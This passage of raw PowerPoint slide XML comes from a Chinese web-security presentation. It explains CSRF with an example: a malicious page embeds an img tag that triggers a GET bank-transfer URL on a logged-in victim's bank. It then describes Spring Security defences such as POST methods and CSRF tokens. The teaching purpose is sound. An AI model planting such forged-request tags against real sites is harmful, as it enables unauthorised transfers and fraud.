                  </a:solidFill>
                </a:rPr>
                <a:t>网站</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>，它以</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>GET</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>请求来完成银行转账的操作，如：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>http://www.mybank.com/Transfer.php?toBankId=11&amp;money=1000</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>危险</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>网站</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>B</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>，它里面有一段</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>HTML</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>的代码如下：</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>　　</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>img</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>src</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>=http://www.mybank.com/Transfer.php?toBankId=11&amp;money=1000&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>　　首先，你登录了银行网站</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>，然后访问危险网站</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>B</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>，噢，这时你会发现你的银行账户少了</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1000</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>块</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>......</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>　　为什么会这样呢？原因是银行网站</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>违反了</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>HTTP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>规范，使用</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>GET</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>请求更新资源。在访问危险网站</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>B</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>的之前，你已经登录了银行网站</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>，而</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>B</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>中的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;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img</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>以</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>GET</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>的方式请求第三方资源（这里的第三方就是指银行网站了，原本这是一个合法的请求，但这里被不法分子利用了），所以你的浏览器会带上你的银行网站</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Cookie</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>发出</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Get</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>请求，去获取资源</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>“</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>http://www.mybank.com/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Transfer.php?toBankId</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>=11&amp;money=1000”</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>，结果银行网站服务器收到请求后，认为这是一个更新资源操作（转账操作），所以就立刻进行转账操作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0806947"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="100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53143" y="551543"/>
            <a:ext cx="4238172" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4238172" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373258" y="1124504"/>
              <a:ext cx="3149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Web</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="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安全策略</a:t>
              </a:r>
              <a:endPara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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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2</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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xmlns="" id="{AC7928B7-4C8F-4F94-9AE1-D1C443BA3495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="994229" y="1183267"/>
            <a:ext cx="10951029" cy="5803773"/>
            <a:chOff x="7478783" y="1890258"/>
            <a:chExt cx="4737417" cy="5167561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Text Box 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9B03D3CB-3C4A-4546-AC9A-A77ED65D0C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54983" y="1890258"/>
              <a:ext cx="4540535" cy="568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45720" tIns="22860" rIns="45720" bIns="22860">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Spring Security </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>防范</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>CSRF </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>攻击</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt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xmlns="" id="{B56AA7D8-76EF-4DB2-9171-0DCF3C3F9940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7478783" y="2371770"/>
              <a:ext cx="4737417" cy="46860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建议</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>CSRF</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>保护任何可以由普通用户浏览器处理的请求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</a:rPr>
                <a:t>。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</a:rPr>
                <a:t>Spring Security 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</a:rPr>
                <a:t>实现</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>CSRF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</a:rPr>
                <a:t>保护的步骤：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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、使用合适的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HTTP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方法</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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在应用中使用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</a:rPr>
                <a:t>PATCH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</a:rPr>
                <a:t>、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</a:rPr>
                <a:t>POST</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>, 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</a:rPr>
                <a:t>PUT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</a:rPr>
                <a:t>、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</a:rPr>
                <a:t>DELETE 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</a:rPr>
                <a:t>方式。不建议采用</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>HTTP GET </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>方式，因为</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>GET</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>方式会泄露用户信息。建议用</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>POST</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>方式替换。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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、配置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CSRF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保护</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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r>
                <a:rPr lang="en-US" altLang="zh-CN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CSRF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保护默认是开启的，也可以自定义，比如关闭</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>CSRF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保护，如图：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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r>
                <a:rPr lang="en-US" altLang="zh-CN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3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、包含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CSRF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令牌</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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表单提交：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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确保在所有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PATCH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、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POST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、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PUT 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和 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DELETE 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方式中包含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CSRF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令牌在表单中增加 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_</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>csrf</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400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请求属性获取当前</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="14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CsrfToken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。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JSP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示例如图：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
            <a:p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注：如果采用了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Spring MVC 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的 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&lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="14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form:form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&gt;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标签或 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="140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Thymeleaf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 2.1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以上版本，将自动在表单中生成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CSRF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令牌隐藏域</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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(</a:t>
              </a:r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即使用</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>CsrfRequestDataValueProcessor</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US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960" y="2655997"/>
            <a:ext cx="4913329" cy="144116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1935" y="4804229"/>
            <a:ext cx="3419048" cy="141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770074"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="100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蓝绿色科技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1587</TotalTime>
  <Words>3203</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>402</Paragraphs>
  <Slides>38</Slides>
  <Notes>38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3" baseType="lpstr">
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial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蓝绿色科技</dc:title>
  <dc:creator>李杨</dc:creator>
  <cp:lastModifiedBy>denny</cp:lastModifiedBy>
  <cp:revision>164</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-06-27T11:35:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-13T06:58:02Z</dcterms:modified>
</cp:coreProperties>
</file>